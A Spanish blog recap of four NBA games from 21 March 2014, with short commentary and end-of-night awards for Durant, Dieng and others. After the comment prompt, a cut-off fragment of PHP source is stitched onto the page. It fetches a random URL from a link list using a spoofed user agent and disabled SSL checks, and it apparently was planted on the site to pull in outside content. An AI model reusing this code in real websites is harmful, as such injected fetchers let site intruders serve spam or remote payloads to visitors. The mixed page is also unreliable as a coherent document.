La Crónica: Sin excusas

21 de March de 2014 por TheDeerHunter

Noche de ausencias significativas, aunque en el Oeste nadie puede permitirse lamentarlas.

Comenzábamos con la visita de los Thunder a Cleveland, con las bajas conocidas de Irving y Deng por los locales más el descanso de Westbrook estipulado en los back-to-back. Conviene no olvidar que Oklahoma también arrastra las bajas de hombres clave como Sefolosha y Perkins pero cuanto más en precario se ven más brilla Durant, en medio de su particular caza del MVP y de la marca de Jordan. Por los Cavs, Waiters y Hawes mantuvieron a los suyos con vida hasta los instantes finales (102-95).

En Houston caía Dwight Howard a la lista de lesionados en la que ya teníamos a Pekovic por parte de los Wolves. Estos llegaban cargados de moral tras su cacareada victoria ante Dallas pero esta temporada no les salen dos partidos buenos seguidos. Tocaba la de arena para el perímetro de los Wolves (26 puntos en 33 tiros para Ricky, Martin, Brewer, Budinger y Barea) y el día libre para los sistemas defensivos. Harden y los suyos lo disfrutaron como es debido con hasta 7 hombres en dobles figuras. La sorprendente actuación de Dieng queda para la anécdota (106-129).

Los Blazers conseguían la crítica victoria ante Washington que les exigía, con algunas reservas por la baja de Aldridge, Nacho hace un par de días. Por los Wizards a la conocida de Nene añadíamos anoche a Gortat, lo que facilitó mucho la cuestión. Lillard y Matthews le ganaron la batalla a Wall y Beal en una noche en la que la defensa de los Wizards también brilló por su ausencia. Otro gran partido de Gooden, por cierto (103-116). 

Finalmente, descontada la ya supuesta victoria de los Warriorsante los Bucks aunque les dio por tontear más de la cuenta. Recuperaban a Bogut aunque no a Jermaine ni Iguodala. Por su parte, los ciervos, sin OJ Mayo, colocaban a Sanders el cartel de out of season aunque a estas alturas no le importa a casi nadie. Bonita actuación de Curry, bien apoyado por Klay Thompson y Lee. Así alcanzan el mejor balance provisional de las últimas dos décadas y, junto los Spurs, son el equipo más en forma tras el all-star (110-115).

PREMIOS

MVP: Durantula. 33º partido seguido por encima de los 25 puntos. Anoche alcanzó los 35 y añadió 11 rebotes y 6 asistencias.

Rookie: El senegalés Gorgui Dieng firmó un 22-21 ante Houston y Giannis Antetokoumpo a su ritmo. Sólo 11 puntitos en 6 tiros a canasta pero 8 rebotes, 4 asistencias y 1 robo.

Sorpresa: Partido notablemente sólido de Donatas Motiejunas. 20 puntos en una magnífica serie de 9 de 11 y 6 rebotes en 26 minutos.

Decepción: El perímetro de los Wolves pero Ricky Rubio por encima de todos tras su anterior sobresaliente partido.

Esfuerzo en vano: La segunda unidad de los Bucks, con Sessions, Antetokumpo, Adrien y Henson… Mucho mejor que la primera.

TOP-5

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>